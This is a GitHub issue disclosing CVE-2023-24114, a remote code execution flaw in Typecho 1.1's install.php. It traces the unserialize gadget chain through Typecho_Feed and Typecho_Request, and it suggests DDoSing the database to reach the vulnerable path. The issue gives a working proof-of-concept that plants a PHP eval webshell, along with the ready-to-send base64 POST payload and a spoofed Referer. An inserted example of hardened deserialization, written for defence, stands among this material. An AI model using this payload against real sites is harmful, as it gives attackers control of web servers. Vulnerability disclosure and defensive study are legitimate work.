CVE-2023-24114: the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability · Issue #1523 · typecho/typecho
typecho 1.1/17.10.30 was discovered to contain a remote code execution (RCE) vulnerability via install.php.
List of vulnerable paths:
/install.php
Lines 60-69 of install.php catch the database error but do nothing with it, so the `exit` on line 65 is bypassed.
This happens when the network is unstable; we can create the situation by DDoSing a database exposed to the public network, or just wait for it.
We can simulate this situation with breakpoint debugging: set a breakpoint on line 60, then cut off the connection to the database (for example PhpStorm + phpStudy).
Lines 74-87 of install.php: we can fake the Referer to bypass the second `exit`; setting the Referer to "http://localhost/" is enough.
Line 291 of install.php calls `unserialize`, which can be exploited maliciously.
Its parameter comes from line 83 of /var/Typecho/Cookie.php.
Line 420 of install.php triggers `__toString`.
Line 223 of /var/Typecho/Feed.php defines `__toString`.
Line 290 of /var/Typecho/Feed.php triggers `__get`.
Line 270 of /var/Typecho/Request.php defines `__get`.
From there, `call_user_func` can be abused to achieve remote code execution.
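The sink described above (the base64-encoded `__typecho_config` value handed straight to `unserialize`) next to a hardened handling of the same value. This is an added illustration and not Typecho's own code; the function names and the source of `$raw` are assumptions, and only the data shape (an array of scalar settings) is taken from the description above.

```php
<?php
// Added example (not Typecho's code). The config parameter arrives
// base64-encoded in the __typecho_config cookie/POST field and is
// expected to decode into a plain array of settings such as 'prefix'.

// Vulnerable pattern: unserialize instantiates whatever classes the
// attacker names (Typecho_Feed, Typecho_Request, ...), so their
// __toString/__get magic methods become reachable later in the request.
function loadConfigUnsafe(string $raw): array
{
    $config = unserialize(base64_decode($raw));
    return is_array($config) ? $config : [];
}

// Hardened pattern: refuse objects entirely and validate the shape.
function loadConfigSafe(string $raw): array
{
    $decoded = base64_decode($raw, true);
    if ($decoded === false) {
        throw new InvalidArgumentException('config is not valid base64');
    }
    // allowed_classes => false (PHP >= 7.0) turns every O:/C: record into
    // __PHP_Incomplete_Class, so no application class is instantiated and
    // no magic method of the application's classes can run.
    $config = @unserialize($decoded, ['allowed_classes' => false]);
    if (!is_array($config)) {
        throw new InvalidArgumentException('config must be an array');
    }
    foreach ($config as $key => $value) {
        // Any object (including __PHP_Incomplete_Class) fails is_scalar.
        if (!is_scalar($value)) {
            throw new InvalidArgumentException("config key '$key' must be scalar");
        }
    }
    return $config;
}

// Constructed sample inputs: a benign settings array, and a payload that
// smuggles a serialized object (an empty Typecho_Feed) under 'prefix'.
$benign = base64_encode(serialize(['prefix' => 'typecho_']));
$object = base64_encode('a:1:{s:6:"prefix";O:12:"Typecho_Feed":0:{}}');

var_dump(loadConfigSafe($benign));   // array with 'prefix' => 'typecho_'
try {
    loadConfigSafe($object);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Logging the rejection (with the decoded prefix, e.g. the presence of an `O:` record) gives a cheap detection signal for attempts against this parameter.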
Vulnerability exploitation process:
This happens when the network is unstable; we can create the situation by DDoSing a database exposed to the public network, or just wait for it. Of course, we can also send the network packets repeatedly while waiting for it.
If the PoC succeeds, "ok" is returned. Then test the webshell.
POC code:
```php
<?php
class Typecho_Request {
    private $_params = array('screenName' => 'php -r "echo \'ok\';file_put_contents(\'cmd.php\', \'<?php eval($_POST[\"youyou\"]); ?>\');"');
    private $_filter = array('system');
}
class Typecho_Feed {
    private $_items = array();
    private $_type = 'ATOM 1.0';
    public function __construct() {
        $items['author'] = new Typecho_Request();
        $this->_items[0] = $items;
    }
}
$config['prefix'] = new Typecho_Feed();
$payload = base64_encode(serialize($config));
echo $payload;
```
```
URL: http://localhost/install.php?start=1
POST Data: delete=true&__typecho_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0=
Referer: http://localhost/
```